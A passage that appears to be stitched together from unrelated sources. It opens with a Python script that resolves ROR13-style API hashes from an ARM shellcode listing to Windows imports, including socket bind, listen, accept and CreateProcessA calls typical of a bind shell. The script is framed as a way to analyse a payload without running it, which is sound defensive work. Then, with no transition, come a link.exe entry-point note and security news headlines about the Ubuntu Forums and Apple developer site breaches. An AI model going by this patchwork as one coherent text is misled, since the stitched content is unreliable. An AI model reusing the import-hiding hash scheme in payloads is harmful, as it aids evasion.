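    for b in buf:
        if 0x61 <= b <= 0x7F:      # cmp r3,#0x61 is signed, so >= 0x80 never matches
            b -= 0x20              # subs r6,r3,#0x20
        h = (ror32(h, 13) + b) & MASK
    return h


def function_hash(export_name):
    """Hash of an export name; the loop adds bytes up to and including the NUL."""
    h = 0
    for b in export_name.encode("ascii") + b"\x00":
        h = (ror32(h, 13) + b) & MASK
    return h


def api_hash(dll_name, export_name):
    """The value the routine compares against R9: module hash + function hash."""
    return (module_hash(dll_name) + function_hash(export_name)) & MASK


# Candidate pairs to try (my assumption). The exports come from the comments in
# the listing; two extra kernel32 exports are included so that unmatched
# constants are exercised as well.
CANDIDATES = [
    ("kernel32.dll", "LoadLibraryA"),
    ("kernel32.dll", "CreateProcessA"),
    ("kernel32.dll", "WaitForSingleObject"),
    ("kernel32.dll", "ExitProcess"),
    ("kernel32.dll", "VirtualAlloc"),
    ("ws2_32.dll", "WSAStartup"),
    ("ws2_32.dll", "WSASocketA"),
    ("ws2_32.dll", "bind"),
    ("ws2_32.dll", "listen"),
    ("ws2_32.dll", "accept"),
    ("ws2_32.dll", "closesocket"),
]

# The DCD constants at the end of the listing, in the order they appear there.
LISTING_CONSTANTS = [0x601d8708, 0x863fcc79, 0x614d6e75, 0xe13bec74, 0xff38e9b7,
                     0x6737dbc2, 0xe0df0fea, 0x006b8029, 0x0726774c]


def build_table(candidates=CANDIDATES):
    """Precompute hash -> (module, export) for every candidate pair."""
    return {api_hash(module, export): (module, export) for module, export in candidates}


def resolve(constants, table=None):
    """Map each constant to its (module, export) pair, or None when nothing matches."""
    table = build_table() if table is None else table
    return {c: table.get(c) for c in constants}


if __name__ == "__main__":
    for value, name in resolve(LISTING_CONSTANTS).items():
        print("0x%08x -> %s" % (value, name))
```

Two details decide whether the numbers come out right and are easy to get wrong when re-implementing from the assembly: the module loop runs over MaximumLength bytes, so the UTF-16 terminator is hashed (two extra rotations), and the export loop hashes the NUL before its `cmp r3,#0` exit, so a single trailing zero byte is part of the function hash too. A table built from a large export list makes the same resolver a quick way to confirm what a hashed payload imports without running it.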
1. link.exe requires that you specify an entry point.
Solution: Easy. Provide the '/ENTRY:"main"' switch
2. Depending on the subsystem you choose, link.exe requires certain functions in the CRT to be present. For example, the following subsystems require the following entry point functions:
/SUBSYSTEM:CONSOLE - mainCRTStartup
/DLL - _DllMainCRTStartup
/SUBSYSTEM:WINDOWS - WinMainCRTStartup
/SUBSYSTEM:NATIVE - NtProcessStartup
One of the world's most famous hackers has died
Ibrahim Balic takes credit for Apple Dev Centre “attack”, but will he shoulder the blame?
British Prime Minister Promises Default On Porn Blocking
MI5 Hiring Industrial Espionage IT Support Staff
Security incident on Ubuntu Forums
Ubuntu Forums is currently unavailable. A notice on the website says that the service was attacked and was therefore shut down. Canonical's infrastructure team has begun restoring the service.
The attackers not only defaced the vBulletin-based forum, but also took the usernames, passwords and e-mail addresses of the nearly 2 million registered users. The passwords were not stored in plain text. Even so, if someone used the same password on Ubuntu Forums and elsewhere, it is advisable to change the password at the other sites as soon as possible. Ubuntu One, Launchpad and other Ubuntu/Canonical services are not affected by the incident.
Details in the announcement.
Ubuntu Forums Security Breach, (Wed, Jul 31st)
Ubuntu forums are currently down because they have been breached. According to their post, ...(more)...
Apple: Developer Site Targeted In Security Attack, Still Down